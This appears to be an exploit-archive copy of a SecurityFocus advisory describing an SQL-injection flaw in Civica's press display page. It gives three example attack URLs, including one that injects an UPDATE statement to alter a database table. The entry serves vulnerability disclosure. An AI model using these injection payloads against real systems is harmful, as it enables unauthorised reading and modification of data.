12 lines
No EOL
643 B
Text
12 lines
No EOL
643 B
Text
source: https://www.securityfocus.com/bid/20354/info
|
|
|
|
Civica is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
http://www.example.com/civica/press/display.asp?layout=1&Entry=1,2,3,4,5,......
|
|
|
|
http://www.example.com/civica/press/display.asp?layout=1&Entry=1 having 1=1
|
|
|
|
http://www.example.com/civica/press/display.asp?layout=1&Entry=1,2,3,4,5,,,,,+upd
|
|
ate+prtReleases+set+isplayStyle='text';-- |